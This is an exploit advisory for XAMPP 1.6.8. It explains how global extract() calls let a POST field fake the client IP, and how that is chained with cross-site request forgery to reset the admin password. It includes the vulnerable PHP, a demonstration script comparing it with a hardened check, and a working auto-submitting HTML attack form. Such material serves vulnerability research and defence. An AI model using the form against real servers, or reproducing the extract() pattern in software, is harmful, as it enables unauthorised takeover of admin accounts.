XAMPP 1.6.8 - Cross-Site Request Forgery (Change Administrative Password)

EDB-ID: 7384
Platform: Windows
Date: 2008-12-08

XAMPP change administrative password:
--------------------------------------------------------------------------------
Written by Michael Brooks
special thanks to str0ke

Affects XAMPP 1.6.8.
homepage: http://www.apachefriends.org/
XAMPP has 17+ million downloads from sourceforge.net.
Exploitable with register_globals=On or Off.
The attack works even while XAMPP's own status page reports a fully
secure system: http://10.1.1.10/security/index.php

Two vulnerabilities are chained together:
1) Global variable manipulation (extract() on untrusted input) to spoof the client IP address.
2) XSRF to change the .htaccess password for http://10.1.1.10/security/
   and http://10.1.1.10/xampp/ .

$_SERVER['REMOTE_ADDR'] is filled in by Apache from the TCP socket and
cannot normally be spoofed. However, extract($_POST) at global scope can
overwrite any variable that is already declared, including the $_SERVER
superglobal: a POST field named _SERVER[REMOTE_ADDR] arrives as
$_POST['_SERVER']['REMOTE_ADDR'], and extract($_POST) replaces $_SERVER with
that attacker-supplied array. The extract($_SERVER) that follows then defines
$REMOTE_ADDR from it, which "spoofs" the client IP address as 127.0.0.1.
The XSRF attack therefore works from a browser at any IP address, as long as
that browser currently holds valid credentials for the password-protected
/security/ directory.

This vulnerable code is from the very top of /security/xamppsecurity.php:
<?php
       error_reporting(0);
       extract($_POST);     // attacker-controlled keys become global variables,
                            // including a replacement for $_SERVER itself
       extract($_SERVER);   // $REMOTE_ADDR is now taken from whatever $_SERVER holds
       $host = "127.0.0.1";
       $timeout = "1";

       if ($REMOTE_ADDR) {
               if ($REMOTE_ADDR != $host) {
                       echo "<h2> FORBIDDEN FOR CLIENT $REMOTE_ADDR <h2>";
                       exit;
               }
       }
//...
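
The order of the two extract() calls is the whole bug. The script below is an
added example, not code from XAMPP or from the advisory author: it replays that
check from the PHP CLI against a constructed request and places a hardened
check next to it. The client address 10.1.1.50, the helper names
client_is_local and request_is_authorized, and the csrf_token field are
assumptions of this example, not part of XAMPP 1.6.8.

```php
<?php
// Added example (not XAMPP or advisory code). Run from the CLI:
//   php xampp_extract_demo.php
// Assumed: client address 10.1.1.50, helper names, and the csrf_token field.

// Constructed request, as a non-local browser would send it for the XSRF page:
// Apache saw the real socket peer; the POST body carries the forged field.
$_SERVER['REMOTE_ADDR'] = '10.1.1.50';
$_POST = [
    '_SERVER'     => ['REMOTE_ADDR' => '127.0.0.1'], // "_SERVER[REMOTE_ADDR]=127.0.0.1"
    'xamppuser'   => 'admin',
    'xampppasswd' => 'password',
    'xamppaccess' => 'Make safe the XAMPP directory',
];

// ---- Hardened check (evaluated first, before anything touches $_SERVER) ----
// Reads the peer address from the untouched superglobal, never extract()s
// request data, and additionally demands a per-session anti-CSRF token so that
// even a logged-in browser on the server itself cannot be driven by a third
// party's page.
function client_is_local(array $server): bool
{
    return isset($server['REMOTE_ADDR']) && $server['REMOTE_ADDR'] === '127.0.0.1';
}

function request_is_authorized(array $server, array $post, string $session_token): bool
{
    return client_is_local($server)
        && isset($post['csrf_token'])
        && hash_equals($session_token, (string) $post['csrf_token']);
}

$session_token   = bin2hex(random_bytes(16)); // would normally live in the session
$real_addr       = $_SERVER['REMOTE_ADDR'];   // snapshot of the genuine peer address
$hardened_allows = request_is_authorized($_SERVER, $_POST, $session_token);

// ---- Vulnerable sequence, in the order xamppsecurity.php executes it ----
// extract() writes into the global symbol table, so the POST key "_SERVER"
// replaces the superglobal with the attacker's array; the second extract()
// then defines $REMOTE_ADDR from that array instead of from the TCP peer.
extract($_POST);
extract($_SERVER);
$host = "127.0.0.1";
$vulnerable_allows = true;
if ($REMOTE_ADDR) {
    if ($REMOTE_ADDR != $host) {
        $vulnerable_allows = false;
    }
}

printf("peer address Apache saw   : %s\n", $real_addr);
printf("\$REMOTE_ADDR after extract: %s\n", $REMOTE_ADDR);
printf("original check            : %s\n", $vulnerable_allows ? 'ALLOWED (spoofed)' : 'forbidden');
printf("hardened check            : %s\n", $hardened_allows ? 'allowed' : 'FORBIDDEN');
```

The original sequence lets the 10.1.1.50 client through because $REMOTE_ADDR
never came from the socket, while the hardened check rejects it twice over:
the real peer is not loopback, and no token accompanies the request. Note that
the loopback check alone is not a CSRF defence; a browser on the XAMPP host
that holds the .htaccess credentials would still submit the form, which is why
the token is needed as well.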

//Start of xsrf attack
<html>
	<!-- The field named _SERVER[REMOTE_ADDR] arrives as $_POST['_SERVER']['REMOTE_ADDR'];
	     extract($_POST) turns it into a forged $_SERVER array. -->
	<form action="http://10.1.1.10/security/xamppsecurity.php" method="POST" id="xsrf">
		<input type="hidden" name="_SERVER[REMOTE_ADDR]" value="127.0.0.1">
		<input type="hidden" name="xamppuser" value="admin">
		<input type="hidden" name="xampppasswd" value="password">
		<!-- the browser URL-encodes the spaces itself; a literal "+" here would be sent as %2B -->
		<input type="hidden" name="xamppaccess" value="Make safe the XAMPP directory">
		<input type="submit">
	</form>
	<script>
		document.getElementById("xsrf").submit();
	</script>
</html>
//End of xsrf attack

# milw0rm.com [2008-12-08]